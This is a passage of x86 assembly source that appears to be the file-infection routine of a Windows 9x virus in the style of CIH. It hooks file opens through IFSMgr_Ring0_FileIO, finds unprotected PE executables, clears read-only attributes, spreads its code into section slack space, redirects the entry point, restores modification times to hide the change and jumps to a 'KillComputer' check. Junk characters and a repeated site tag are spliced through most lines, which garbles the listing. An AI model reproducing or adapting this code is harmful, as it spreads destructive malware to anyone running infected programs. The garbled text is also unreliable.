`{/qP;B_3Xg0push FileNameBufferSize★黑基空间★x$a0@ _}5]'o-A@X
mov ebx, [ebx+10h]★黑基空间★7UZF{ I&G#hJ6pw[
mov eax, [ebx+0ch]
(T ej'mU!X0add eax, 04h★黑基空间★:QK(c~!ro%R
push eax
k#`8sv%gT)u0push esi
*]/k~1u7id&l$wZ0int 20h ; VXDCall UniToBCSPath
$r N@M D{0UniToBCSPath = $★黑基空间★v4R B)PLKf
dd 00400041h★黑基空间★;s$[&j9@\
add esp, 04h*04h
RBRq,nc0
ln7u-P"G:WD0; *************************************★黑基空间★(?%L~&Ehp2x
; * Is FileName '.EXE' !?             *
o#BQR?"i AD9c#K0; *************************************★黑基空间★-J8P)U*~ zu
★黑基空间★i)Z"S` v
cmp [esi+eax-04h], 'EXE.'
^4Y7bi7D I/mJ0pop esi★黑基空间★_ wDaU1q.S
jne DisableOnBusy
$q4g8G*jp0★黑基空间★\R4?c i8R
IF DEBUG
,h&v/cJWW#?Eq#w{0
:a~;D]Di G |1eA}0; *************************************★黑基空间★/M'IL9Z'aJ
; * Only for Debug                    *
Zw^f7C!nr]0; *************************************★黑基空间★y|m C:H
★黑基空间★j5?/G+Sw:_\dP
cmp [esi+eax-06h], 'KCUF'★黑基空间★]^)ZZ,_&^
jne DisableOnBusy
hz'l ey3Ili0★黑基空间★)QB7D]7lC2{ O~&G
ENDIF
-ccS9y_&aM:AWi0
:j7}loJF5{7pqw0; *************************************★黑基空间★7X-M;qt$Un+TY
; * Is Open Existing File !?          *
#F-|2oEmR0; *************************************★黑基空间★W:mdXx_ { {6@#z

1v8su5xT&An0; if ( NotOpenExistingFile )
eV^9Y]*G~W`0; goto DisableOnBusy★黑基空间★bbZUVuxB k
cmp word ptr [ebx+18h], 01h★黑基空间★$K*E'T Q3fY c
jne DisableOnBusy★黑基空间★q0RH/e%f#w} D6P
★黑基空间★5R-j*r0L2Uf
; *************************************★黑基空间★ P-SHC,[(An,@y
; * Get Attributes of the File        *★黑基空间★~1~P(M6B/sYF/v
; *************************************
:Znhl,Fzn_0★黑基空间★ H;u.h tA3i;r
mov ax, 4300h
5TxZmSU+i?I0int 20h ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★#wH(DUe
IFSMgr_Ring0_FileIO = $
M"@)DR d0dd 00400032h★黑基空间★2]n^$GN Q4`
jc DisableOnBusy
[$E+~+F4xg0push ecx
1`v`6v i0f2kR0
%]5^%l.p8N%h0; *************************************★黑基空间★&C%yI.Wy'eS F
; * Get IFSMgr_Ring0_FileIO Address   *
0Okx#_-q0; *************************************★黑基空间★u'O8_F"I,Gu

}I8fQ^6|,im0mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
Do] OA(H6?0mov edi, [edi]
Xdk/p~YWp0★黑基空间★.|4MD;lK
; *************************************★黑基空间★8{|)a2|V}
; * Is Read-Only File !?              *
_O0N#M;iro0; *************************************
8E2{_,M0M;?i0★黑基空间★9F ` hS-W0FU3y
test cl, 01h★黑基空间★:` p!z'amQ}v
jz OpenFile★黑基空间★K AsF2q:{6SXf

|7iB)V0\|S5A1f*{0; *************************************★黑基空间★#tv4P-fW!dK'D
; * Modify Read-Only File to Write    *★黑基空间★ pxI:h:K,j8g!f` k
; *************************************★黑基空间★L"p+g-}l7zWXx
★黑基空间★/K#k"f'F2c2H
mov ax, 4301h★黑基空间★8Xwet#Sp
xor ecx, ecx★黑基空间★ V:[hVs7]-X+dO
call edi ; VXDCall IFSMgr_Ring0_FileIO
mn8hT(c,D b*g8i+w0
0x-a)cf[X^;^#f:A|0; *************************************
8QM?'pZGO,r0; * Open File                         *
y;al Pv^:rO:]2FI0; *************************************
6CH-]T^0★黑基空间★0Q(H:t/Z.m/~h"f8`l
OpenFile:
K_e0HL.fs W0xor eax, eax
-hbH,K:c0mov ah, 0d5h
k,I,e"\ ms0xor ecx, ecx★黑基空间★(Uwc.S's I
xor edx, edx
d N,r7bH1Kxt6K0inc edx★黑基空间★v@7G9C$wU6DZ-t
mov ebx, edx
C!Dj8ilp/Z*hO0inc ebx★黑基空间★o_e,H3m4lZ
call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★P)Q D x)y7q0A5H/i
xchg ebx, eax ; mov ebx, FileHandle
:CL%? YFL0★黑基空间★v_2| s9Ad(lc1X
; *************************************★黑基空间★Q B?Rv[%a9Z
; * Need to Restore                   *
?eit_0; * Attributes of the File !?         *
w#v+`ZUA0; *************************************★黑基空间★r7l1T'lBeJ9p#O6O

Tp_qsvW`0Y0pop ecx
P)O4b$SQlQ{0pushf★黑基空间★"I/Z-w2S E)p
test cl, 01h
Mu4L*CM.X|#V0jz IsOpenFileOK★黑基空间★u|g/MyH8hF x
★黑基空间★sm U{^g
; *************************************★黑基空间★P^6YF@k#_
; * Restore Attributes of the File    *★黑基空间★uf K;h \ rY)j
; *************************************
!b+Zxbi`0
!i RRh"@!h.ap0mov ax, 4301h★黑基空间★ ]j.x)UYV!m
call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★`9Zh-ry(p+kV^/A
★黑基空间★B ht"k/Ys u!S
; *************************************★黑基空间★1Z_P)bdb Y
; * Is Open File OK !?                *
"~*c'HR'W*Yq&KN#X0; *************************************★黑基空间★K;eno~&Y9Q8^

IW K%j9EO0IsOpenFileOK:
fl'cj(hX$b s0popf
_J k$c;L+Q r;~0jc DisableOnBusy★黑基空间★V \Kp feN-f

fE X:Jx:FU v7Yi{0; *************************************★黑基空间★6B!jZ&PHq |MtXj
; * Open File Already Succeed.   ^__^ *★黑基空间★8m)B0Q7YLo+kFx
; *************************************
N1C B$N+z6~0★黑基空间★XMQ{4`7EPk
push esi ; Push FileNameBuffer Address to Stack
Ld%p,t ec0
1?!JJ}4X#n2L0pushf ; Now CF = 0, Push Flag to Stack
9J2}xM e;d3z0★黑基空间★0a?4~| b6k
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
7x F&G!kttEX}I0★黑基空间★G,IH0q'_!UT[
; ***************************
{-oq1\5z|0; * Get OffsetTonewHeader   *
9~i&`W A&jK%ieU0; ***************************
Jlk/c|F]0★黑基空间★(t9} Tbua4?| H
xor eax, eax★黑基空间★/e m/c:hr{3v
mov ah, 0d6h
{u m3V0G0; For Doing Minimal VirusCode's Length,★黑基空间★EzS@Is
; I Save EAX to EBP.★黑基空间★2l5V0O7D5r%VO!c B:]
mov ebp, eax
9w?8p+t&~z~0push 00000004h★黑基空间★V1S(GIa4gBR
pop ecx★黑基空间★{d!i.R M3Z)P$Rl
push 0000003ch★黑基空间★LF:}6@:UF}
pop edx
#e)Oyks)g0call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★U\EVL
mov edx, [esi]★黑基空间★R_2h.s*MtD&h

)fVm1dN5T%T O$B\0; ***************************★黑基空间★q2WP\+h
; * Get 'PE\0' Signature    *
]4z9Z.E"p FW Ef[r0; * of ImageFileHeader, and *★黑基空间★R4{6y"I!o$`bM?V
; * Infected Mark.          *★黑基空间★2@[^-B:S@-{$HB_
; ***************************
*bf(n9cF/t)v0Q,U"N0
]$PW?(N"p8P0dec edx
:g2xsX)I~8m0mov eax, ebp★黑基空间★]NU9I'gER
call edi ; VXDCall IFSMgr_Ring0_FileIO
,u&Gv%a_W4iG0★黑基空间★4I?` vf#}
; ***************************
:NSJ;THh3d0; * Is PE !?                *
T{ [)B4H$|6n0; ***************************
9P3f N:yuRe0; * Is the File             *
Zba E3f:Xz0; * Already Infected !?     *★黑基空间★-MX%G~;X6Q6q
; ***************************★黑基空间★eh6E'p-H
; * WinZip Self-Extractor   *★黑基空间★i:d/X,o;f3M*pC
; * doesn't Have Infected   *
$_7j'Bex&u;p*JW~0; * Mark Because My Virus   *
g4}z!x-O,_cH*N7I0; * doesn't Infect it.      *
%g2Gmch}2A0; ***************************★黑基空间★~O o!u#u1|*YL4|
★黑基空间★e&R8xXj-i9T \'ym I[
cmp dword ptr [esi], 00455000h
,K d-A iJEE*}0jne CloseFile
^k"`~9B"{G9hH0
5GQ;Y`(S:Kh0; *************************************★黑基空间★9?@3F6J'l*Xv)~:P
; * The File is                   ^o^ *★黑基空间★7gl#zH6r `i)e
; * PE(Portable Executable) indeed.   *
d}C1_d0; *************************************
h)V4~H*E#s0; * The File isn't also Infected.     *
.c-d.?fK0; *************************************★黑基空间★-C;d%q e+} pA\|
★黑基空间★NVs)u+A jW+T)p
; *************************************★黑基空间★k1[S` qO]X
; * Start to Infect the File          *★黑基空间★l2K(L{9G ~} f
; *************************************★黑基空间★ x8hz6z-_ @
; * ReGISters Use Status Now :        *
W"gdy]#J2s(I0; *                                   *
y4\ct*Y s:o8l0; * EAX = 04h                         *
5z\[2BQ-p0; * EBX = File Handle                 *
"k5T8j Q4Yx~]4G0; * ECX = 04h                         *★黑基空间★$KiK~PA@#c*Q
; * EDX = 'PE\0\0' Signature of       *★黑基空间★:{Vp ]1YP1r
; *       ImageFileHeader Pointer's   *
W Y S%Y!Km*j{1Xe0; *   Former Byte.                *
J-^4T _.C$J j]0; * ESI = DataBuffer Address ==> @8   *
+o$D M&f7d u7V%_W9W p)B0; * EDI = IFSMgr_Ring0_FileIO Address *★黑基空间★)L"W Roi
; * EBP = D600h ==> Read Data in File *
2Y%}!lI~xSq~7P0; *************************************
*XS_h`R{1d%Z0; * Stack Dump :                      *
(Lc4^F b1J/p"[0; *                                   *
{l n*_0r:A?5@a@0; * ESP => -------------------------  *
)AkB7F)vQ3A0; *        |       EFLAG(CF=0)     |  *★黑基空间★z2e M"m+C
; *        -------------------------  *★黑基空间★II3u;MI2BL^
; *        | FileNameBuffERPointer |  *
}~:}.u f!bU } YhF f0; *        -------------------------  *★黑基空间★ Cli J$y9],iI"@
; *        |          EDI          |  *
W#Ae e(]0; *        -------------------------  *★黑基空间★(j%o)W Y*f o-ehK
; *        |          ESI          |  *
)a4W,~jv!a0; *        -------------------------  *
hAj!P1E4]0; *        |          EBP          |  *
v]C}G3}1uK0; *        -------------------------  *
4y@z]eR0; *        |          ESP          |  *
.B.AA]eJ p:u0; *        -------------------------  *★黑基空间★P.Dl*F#y q2J
; *        |          EBX          |  *
8N]B&^#y&O*k)f0; *        -------------------------  *
-_8i#|}8D0; *        |          EDX          |  *
.qK[h:P-v+RR0; *        -------------------------  *★黑基空间★4W%l/u;Kdg;c
; *        |          ECX          |  *
"DX^.^^kF rF0; *        -------------------------  *★黑基空间★(pdGo1l l'vXW.`h{
; *        |          EAX          |  *
jbS(Ij+W.@ \0; *        -------------------------  *★黑基空间★0V$fS,L;N V]p5a
; *        |     Return Address    |  *★黑基空间★O[&y;A X H.kZ'm
; *        -------------------------  *
I?&KeU@(~0; *************************************★黑基空间★8O7p1I-{ ?S8ncG
★黑基空间★4x2ZKU1}7N%\
push ebx ; Save File Handle
Y(OvL#R3o0B%O~0push 00h ; Set VirusCodeSectionTableEndMark
aLj)T)`POd&K0
#s]&k_rz },JJ0; ***************************
E+F8On&_4{lQ0; * Let's Set the           *★黑基空间★ pK$M3gMc
; * Virus' Infected Mark    *
4L$]y7P'R ^C1]w0; ***************************★黑基空间★4m(Om J;v x"br6]
★黑基空间★ d1G8pi$rP4z\
push 01h ; Size★黑基空间★ Ck*b3T Lpg
push edx ; Pointer of File
;YT&f B5g6@'_0push edi ; Address of Buffer★黑基空间★w`/| VBa

%nO{[ Z&KTf!_3p x0; ***************************
k3WV9}Zs7\8O0; * Save ESP Register       *★黑基空间★!qS'r!bq_&Y7l$R m
; ***************************
`3?7d aUqC ]3zA0
5`I `R{"U3N0mov dr1, esp★黑基空间★Vq)h"w PM*jc
★黑基空间★K*j-P[{G&i#]6z
; ***************************★黑基空间★ ^o sohr(?;Y8tL
; * Let's Set the           *
?L)}L4D4d&vBu?.^,@0; * NewAddressOfEntryPoint  *
L!_8g&P Ic0; * ( Only First Set Size ) *★黑基空间★'Q,x4rq6f,h%H7An?
; ***************************★黑基空间★8n"o P]+Y0s.`
★黑基空间★a"P:Aai+k D Q
push eax ; Size
/h!{1E gt l ?6z G0
3R RGxNZU0M0; ***************************★黑基空间★W&M+ww@UD n
; * Let's Read              *★黑基空间★ R_G3|X1L m
; * Image Header in File    *
z"it:m)w0{ N0; ***************************★黑基空间★ Sbcu(gT9`

yF$O-TYCDx2U0mov eax, ebp
N&M1P?I1` y0mov cl, SizeOfImageHeaderToRead★黑基空间★.A{Evt+P8B
add edx, 07h ; Move EDX to NumberOfSections★黑基空间★}#u,Vf:@F6_2@:O!Z
call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★9z*V ]+V4]!z^
★黑基空间★k {p)\'SnX-x
; ***************************★黑基空间★5y*sH ~8Tl$@
; * Let's Set the           *
,nd_"{+X)g5o'H0; * NewAddressOfEntryPoint  *★黑基空间★ @ I'xKR7p }7n
; * ( Set Pointer of File,  *★黑基空间★9v"~QL]-~q y
; *   Address of Buffer   ) *★黑基空间★T,S~|'h/S0G
; ***************************
EO1D5k W:]0★黑基空间★%M~/f&}7Ov!L P6D
lea eax, (AddressOfEntryPoint-@8)[edx]
Mt5|E P0push eax ; Pointer of File★黑基空间★+W ` noC9ClR(KBR
lea eax, (NewAddressOfEntryPoint-@8)[esi]★黑基空间★5g mBh#[e5o
push eax ; Address of Buffer★黑基空间★ i4P-J7}1q IeZ!]/_

m{g1@`e!_Q[0; ***************************★黑基空间★CAOMs/Sc9R
; * Move EDX to the Start   *★黑基空间★1x)jTxtK d%cAH
; * of SectionTable in File *
c s:C7JF,dj8H?0; ***************************★黑基空间★P'TB$`KHrms

\Q2Y \_3b4s0movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]★黑基空间★(Rid;p;V0Or\1x
lea edx, [eax+edx+12h]★黑基空间★Iqvs5F"@3IT
★黑基空间★*x&c-e tCD
; ***************************★黑基空间★:?Zz2]$~}'b
; * Let's Get               *
W;C7?5x/GK,UaE i0; * Total Size of Sections  *★黑基空间★6X"\iK6~g
; ***************************
;eXX+~uz m,y;Mb0
S!R/j8Bw*v'Y0o$w+P0mov al, SizeOfScetionTable
j1AO"}Hn8RCCr@1a0; I Assume NumberOfSections <= 0ffh★黑基空间★/o o3Hz+{5NIq
mov cl, (NumberOfSections-@8)[esi]
TVh;eK9BYp_)w0mul cl
1Az'd.JV }k:W#ona0
l Ip_7W%y9}(y0; ***************************★黑基空间★ S;_p2r}W
; * Let's Set Section Table *
wa(C4g/ce h*]0; ***************************★黑基空间★G6Z"w`c!h
★黑基空间★| k D s*w S
; Move ESI to the Start of SectionTable★黑基空间★;HeE&yl#O stV`
lea esi, (StartOfSectionTable-@8)[esi]★黑基空间★1E7SQ5{4Q9y7yB{X ]0M
push eax ; Size
*mOj:D!q0push edx ; Pointer of File★黑基空间★:~B+r4ml]6mK
push esi ; Address of Buffer★黑基空间★!Qd8l\*}c

hK8bFsAOG6C+H'o0; ***************************
)Mw?zY,XI0lt"b0; * The Code Size of Merge  *★黑基空间★*k/z L(Y9Y
; * Virus Code Section and  *
/j)}*w&\4P:R4p0; * Total Size of Virus     *★黑基空间★;pnIh1k2[ I
; * Code Section Table Must *
2r^$l9Th3`fa0s/d0; * be Small or Equal the   *★黑基空间★}Iy SC&QK
; * Unused Space Size of    *★黑基空间★ VMB J K&B+y
; * Following Section Table *
%AC$@Ca8t8K I0; ***************************★黑基空间★8N3jk K{#h(c5L&u!G

cg'rg2hGm I0inc ecx★黑基空间★A,n`WUt"a
push ecx ; Save NumberOfSections+1
+y]I5fB0shl ecx, 03h
[:| p dhn*JO0push ecx ; Save TotalSizeOfVirusCodeSectionTable
0Aj{5u(KCal4y0★黑基空间★8kO1i~v b,vb%e4Q
add ecx, eax
(F3an"Z D T [u7Z*`0add ecx, edx
bNCR#`&B0sub ecx, (SizeOfHeaders-@9)[esi]
6v"c"fXsmWK0not ecx★黑基空间★Y3|hs@\
inc ecx★黑基空间★Yk;y~H:t,d-T5^
; Save My Virus First Section Code
e D)l5u#E.H5I/fh!L0; Size of Following Section Table...
pX SQ4|9l.@q0; ( Not Include the Size of Virus Code Section Table )
/_Cu+]B"w:r,BN0push ecx
A?3P`4h0xchg ecx, eax ; ECX = Size of Section Table★黑基空间★1l pY D)YC_%Q^X
; Save Original Address of Entry Point★黑基空间★*iD:[4]7Q#G] l
mov eax, (AddressOfEntryPoint-@9)[esi]
L n;o}/kK%q7g?0add eax, (ImageBase-@9)[esi]
\F/Ck D#k2CP!F0mov (OriginalAddressOfEntryPoint-@9)[esi], eax★黑基空间★;jd#T}+V&k
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection★黑基空间★2eX|l@K;M*RT
jl OnlySetInfectedMark
qf m3Qf-s9z A0d yW0
U)uF$n-CH0; ***************************★黑基空间★TA0O,{ j(L9~3~
; * Read All Section Tables *
+C'N_3H w#]'q0; ***************************
.`9Nd9b}m$I%st.T%d b~0
Hs:{'Yu8O-T0mov eax, ebp
cG#n S7B g+r C0call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★S r,sD,[ F RI

"u"L|k C-L0; ***************************★黑基空间★PU(Gd*XZV(J
; * Full Modify the Bug :   *
8@[Y:@e%TL?0; * WinZip Self-Extractor   *★黑基空间★ \ \(Dop
; * Occurs Error...         *★黑基空间★,h3\Rx9^"p$n
; ***************************
%b"Fb+}z'}w%N y0; * So When User Opens      *★黑基空间★B$sHm'IWydh#u6?
; * WinZip Self-Extractor,  *★黑基空间★,GO+e+bVb3GE,C
; * Virus Doesn't Infect it.*★黑基空间★-k%K\ mrj2o
; ***************************
&] y|9~;g:x f1h0; * First, Virus Gets the   *★黑基空间★O\)JjC4G)pL5hW[/]
; * PointerToRawData in the *
]5ZQo2m0; * Second Section Table,   *
-`&q V2D!aEo0; * Reads the Section Data, *
b(W |v/^7N'hW4P0; * and Tests the String of *
-s? ]Ew-N9ub0; * 'WinZip(R)'......       *
@+A{#Djuh D0; ***************************
gd5cV*`X'gT0★黑基空间★{6SpW+C8He,s"_6I&A.OD
xchg eax, ebp★黑基空间★`/\ a&MS0T:GN~
push 00000004h★黑基空间★;SZPx,a)_1H\}
pop ecx
,Ge1Nxr4_Y#k2Xb4[0push edx
'QR$v0{'x:L!n LS0mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]★黑基空间★B G8Qa\w ~
add edx, 12h
)zbIrd'g Li0call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★(Ewpt`5U8~:Y-Tm&EM
                        cmp     dword ptr [esi], 'piZniW'
Ca,_g5O.AH S0je NotSetInfectedMark★黑基空间★x&t/} \gR8r:X
pop edx★黑基空间★N%W@'_1d&h z P

t Zd Ra/a|0cS0; ***************************
i$~:Cpw0; * Let's Set Total Virus   *★黑基空间★II+v6J][*V
; * Code Section Table      *
t T$shl#pG w p0; ***************************
{f!?^bn:\0
p)S%L HUtEBz5m0; EBX = My Virus First Section Code
Uu4I8i'P4L_4p0; Size of Following Section Table★黑基空间★ `*ao%u,Vv
pop ebx
!p5oA#e_0pop edi ; EDI = TotalSizeOfVirusCodeSectionTable★黑基空间★r v%B{c-M,l
pop ecx ; ECX = NumberOfSections+1★黑基空间★2k&h(^+`7z A3yOoP
push edi ; Size★黑基空间★7F'i \ y\
add edx, ebp
1}3d'j$UB0push edx ; Pointer of File★黑基空间★7E)pRbT,o"Y(EC
add ebp, esi★黑基空间★,lY1tlO n
push ebp ; Address of Buffer
`d _2mxw0
!Ve A1}:m#d7x0; ***************************
xo]cR-](Ow0; * Set the First Virus     *
,}|zm$f8O0; * Code Section Size in    *★黑基空间★3z f*zB;w9^
; * VirusCodeSectionTable   *
}q+af,ya;F*T0b0; ***************************★黑基空间★Kc2J0\ xOG%n` C
★黑基空间★Z6};`"z{d
lea eax, [ebp+edi-04h]
&\@g3_ ^c{0mov [eax], ebx★黑基空间★9CgN2_:u+?/C

VLj ya9@\p)V?0; ***************************
u&gL-k:W|f"a%w#[0; * Let's Set My Virus      *★黑基空间★_4UN|KfG?A8v
; * First Section Code      *
y@7vr)A:r)C!_\^0; ***************************★黑基空间★.q8S U}Wz Uc

B}iY7lto {r0push ebx ; Size★黑基空间★5r"h&rw zoe iI
add edx, edi★黑基空间★ X8|[:Y6[8I"`/]TT7y
push edx ; Pointer of File
+W7vGw f7z-K.T_0lea edi, (MyVirusStart-@9)[esi]
l Pk9zVi0push edi ; Address of Buffer★黑基空间★'[yD`:]4J9Z

qeqV6|0; ***************************
Nw? M3U(gb;t0o(a0; * Let's Modify the        *★黑基空间★|eMIs
; * AddressOfEntryPoint to  *★黑基空间★[ |R2szC
; * My Virus Entry Point    *
%FxU(vFc!Q[0; ***************************★黑基空间★qsmC1Q%{u8l
★黑基空间★5~"EX)?4i3z0K
mov (NewAddressOfEntryPoint-@9)[esi], edx
z0V(k&{TmYf1R0★黑基空间★)zU"k6] V
; ***************************★黑基空间★s)UOA+W jJT
; * Setup Initial Data      *
&Cz[vP nc0; ***************************
%Gk6Lg P9Q C-m0★黑基空间★b!x l&LQbbD
lea edx, [esi-SizeOfScetionTable]
Ak\ H,BpS0mov ebp, offset VirusSize
Tq1\M2PH%D;n:u0jmp StartToWriteCodeToSections
(iy%j7PD+wd7d%G |0★黑基空间★D} ~I/tm&R&N
; ***************************★黑基空间★~o9@!Q'w}
; * Write Code to Sections  *★黑基空间★&S#q@^0yAOg;Do
; ***************************
2qp)r&C2K5M0
K$E!g3m;~0LoopOfWriteCodeToSections:
8u { uN.s}q#l VX0
8B&?N {7i6CP+N*p0add edx, SizeOfScetionTable
&IR4G(U8w^G \0mov ebx, (SizeOfRawData-@9)[edx]
R%@H h.He0sub ebx, (VirtualSize-@9)[edx]★黑基空间★[Gn\?v
jbe EndOfWriteCodeToSections
~R:j%R$uC0push ebx ; Size
7oz3[| Vm*L0sub eax, 08h★黑基空间★ N9I5]YMI `lj8v
mov [eax], ebx
mAL,GI&e0mov ebx, (PointerToRawData-@9)[edx]★黑基空间★:k.C NE&z"TE.xb D,j
add ebx, (VirtualSize-@9)[edx]★黑基空间★,M)LO[*q c"H
push ebx ; Pointer of File★黑基空间★ [!Zv e e9K&n1l1@rB
push edi ; Address of Buffer★黑基空间★1p1Sq#eD'Ek3u2iP
mov ebx, (VirtualSize-@9)[edx]★黑基空间★nNN/`,K
add ebx, (VirtualAddress-@9)[edx]
^(g1f GF,D Q p.N0add ebx, (ImageBase-@9)[esi]★黑基空间★c-L9A.tC1]F5j5VP
mov [eax+4], ebx
9t,{8`x*[4~C0mov ebx, [eax]
J/pz5y5D4Nbr,S7g F7O"Z0add (VirtualSize-@9)[edx], ebx★黑基空间★ h1{"a"CVt

0y4Wx*@u+d;P0Zd0; Section contains initialized data ==> 00000040h
a9zr%j+_ g0; Section can be Read.              ==> 40000000h
7b&I\wPN;@+`j0or (Characteristics-@9)[edx], 40000040h★黑基空间★(F7J#qyp&x"G

0R6N:We8f#t;Mm0StartToWriteCodeToSections:★黑基空间★G%g2m P-}~

xPa.K` J)O ]9SD C0sub ebp, ebx★黑基空间★n Uq-_ ]W!z
jbe SetVirusCodeSectionTableEndMark
VDTqL5O:Zd0add edi, ebx ; Move Address of Buffer★黑基空间★7b;T rRw1S
★黑基空间★xX3zB5fh
EndOfWriteCodeToSections:
TnH"R U0
6g,bQi br`/J0i0loop LoopOfWriteCodeToSections
h ]N/Gp!n0★黑基空间★.A$^wB{]x
; ***************************
}j }%@ Lj+M6kT1x0; * Only Set Infected Mark  *★黑基空间★` g)uz%D OYe ^
; ***************************
|8FA8vn[T9vMT}&w0t0
%L!Q4a;E0M*n.Dn0OnlySetInfectedMark:
P#LRp-M?-L8E1f K0mov esp, dr1
a3u2XS#x8I5d0jmp WriteVirusCodeToFile
:my.o_2b;PR0★黑基空间★o&_i|&j"Pd ?I#\
; ***************************
LYM&j S\0; * Not Set Infected Mark   *
6qBe?"]yK/p0; ***************************★黑基空间★%` @$XS-IM$m&w
★黑基空间★C%{:v$[ {Bo9Mz;h$O
NotSetInfectedMark:★黑基空间★)d X&K/?:N@l
add esp, 3ch
!Aw8j ~e]0jmp CloseFile★黑基空间★f#d(H I M7r"t"GO
★黑基空间★7mx9N:V#cn,| VD
; ***************************★黑基空间★/^%L4X3[J4_ F
; * Set Virus Code          *
+Td\ w(\^ l0; * Section Table End Mark  *
9J}9P\\{M5c:Mc0; ***************************
0k#^6[n t*u b0
km2|;gR"l T0SetVirusCodeSectionTableEndMark:
5J1E.V|%W [4G1p0
j:z#AL2\g+M*c0; Adjust Size of Virus Section Code to Correct Value
bx{ r@y0add [eax], ebp
#[&h8@;Kl0add [esp+08h], ebp
*~P4_z!ny0
H i.P8v-vK^ @!O1]4o0; Set End Mark
(O'fCntb#uc0xor ebx, ebx★黑基空间★V/CC ?}
mov [eax-04h], ebx
&|%b8i eo9y(aH0
I:fu@js0; ***************************★黑基空间★i|9D0@s{P
; * When VirusGame Calls    *
^_:xJA g0; * VxDCall, VMM Modifies   *★黑基空间★A&S9~vu.M-^v
; * the 'int 20h' and the   *
2z Y@#B ow0; * 'Service Identifier'    *★黑基空间★x6J }pP"q^"PR|
; * to 'Call [XXXXXXXX]'.   *★黑基空间★2rr7|~(Q9W
; ***************************
$`"[+z!E,i#b0y[ Yg0; * Before Writing My Virus *
Q pV Y7K0; * to File, I Must Restore *
B3Xc1{i1n0; * them First.     ^__^    *★黑基空间★H:@b1a@:fa
; ***************************
SmN@K/m+i O6d0★黑基空间★+Pm`qHP7tr$g f
lea eax, (LastVxDCallAddress-2-@9)[esi]★黑基空间★!r |;?Rw/|)V
mov cl, VxDCallTableSize
$n#o+l9qY[e1[E.A0★黑基空间★,[ D ^@,kl
LoopOfRestoreVxDCallID:
#E(w^2\S.M#ib0mov word ptr [eax], 20cdh
.Y? `cs:ve6e,X0mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]★黑基空间★"t0MH!qa*hX9Z
mov [eax+2], edx
b fi/}ZI"d0movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
6q;Z?j5a o5Y0sub eax, edx
Z.}h;X t8B;t0loop LoopOfRestoreVxDCallID
g jp+xw eyl^0★黑基空间★ P2G'V#P)A%Mj^
; ***************************★黑基空间★ ^;r/^:J _2sD9Q
; * Let's Write             *★黑基空间★l6FPArN
; * Virus Code to the File  *
N({-I\J2jN+C0; ***************************★黑基空间★Lh(u$\8lK
★黑基空间★FaS#M\ G*P.\
WriteVirusCodeToFile:
wTp}z0{0mov eax, dr1★黑基空间★:eiyT GW!WT-u
mov ebx, [eax+10h]
-wYg|'Tp0A0mov edi, [eax]★黑基空间★pw5E*}g
★黑基空间★Y'O&q#G5z iOZK#bSv
LoopOfWriteVirusCodeToFile:
Kr7g3B*k*m(A:~x0★黑基空间★2x4j7}1v(FBr
pop ecx★黑基空间★Vf+a(M1hV
jecxz SetFileModificationMark★黑基空间★QC*?cFOM
mov esi, ecx
J&bJf `!]ofg0mov eax, 0d601h★黑基空间★YP(a'w)b }6uK
pop edx★黑基空间★~(A@3]1x$|_
pop ecx
E[ n a$E0call edi ; VXDCall IFSMgr_Ring0_FileIO
Jvy+A:yp9d0jmp LoopOfWriteVirusCodeToFile
hcQ1C\(~;A0r0
S@(n R&d0; ***************************★黑基空间★ Ar2Y@O+z1s
; * Let's Set CF = 1 ==>    *
?WXE&_Z*_0; * Need to Restore File    *
]!Dy aN0; * Modification Time       *
f4P$\!jjOD c0; ***************************
h)S'z%Qg)jP u!sd0
DI;W)z}w_R-zbFI0SetFileModificationMark:★黑基空间★LY7@ @-GiMu K7~ B
pop ebx
a Vf'A(\f0pop eax★黑基空间★#rU w1X'iV/cs`
stc ; Enable CF(Carry Flag)
9q]\8\-F1R m0pushf★黑基空间★8i"CkSu

pQk'f2V6H ~:YH0; *************************************★黑基空间★ M$F(d Gr9A)[;X;{
; * Close File                        *
N q'zS6Cr5t0; *************************************
z S0[[ gA0★黑基空间★1}p&Y+Bb6dm]
CloseFile:★黑基空间★.[L`\5wr5qT2w%Z Tw
xor eax, eax
.U"uj ~W P%Hn7b0mov ah, 0d7h
1ut,AP c+b9H u0call edi ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★)U%z7dpN5~
★黑基空间★Ih'~|b` G
; *************************************
qJP Xj!Tg l)Ym%hN0; * Need to Restore File Modification *★黑基空间★J3j jJ8f.@a5Oy ?#N"G3B
; * Time !?                           *
|T"wtN)A:~ H+a.~0; *************************************
T#M3f bPt4{0★黑基空间★}+~5g&Vu-[
popf
I?Fj0s(H5w0pop esi
B d!Xb1ye0jnc IsKillComputer★黑基空间★I1p2S'o9LmU

q}X+\${Lx)K"V]4l7cy0; *************************************★黑基空间★.]J [J-kh4LE6{A
; * Restore File Modification Time    *★黑基空间★,U"J `6V2W] [n
; *************************************★黑基空间★X"O"@9J"df2O-|9T
★黑基空间★2j~9I0e2T V)sL/?
mov ebx, edi
0{-@(S#xoB#~?0mov ax, 4303h★黑基空间★K.Lg4d]{#b"s
mov ecx, (FileModificationTime-@7)[esi]
5HV|?3^:t"w2O s?2C0mov edi, (FileModificationTime+2-@7)[esi]
/ruO:ea D {f7O3]9V S0call ebx ; VXDCall IFSMgr_Ring0_FileIO★黑基空间★5?3m9Zm/p bET}!o

bk5vw4R0; *************************************
F#d!zMM/FY0; * Disable OnBusy                    *★黑基空间★.[ ~ Bcm)R~u
; *************************************★黑基空间★Fh/af[[

u i#c(v%}k0[p0DisableOnBusy:★黑基空间★!w(N)P{4aLo(z
dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy★黑基空间★^Q%vJ'mG3g+?mN;o

;p*qixc0; *************************************★黑基空间★-N'd7d*w3~ q,C @5O;|r
; * Call Previous FileSystemApiHook   *★黑基空间★Q9A| Ae&a+I_ h
; *************************************★黑基空间★/pRw7q,C^q6@ YM6}

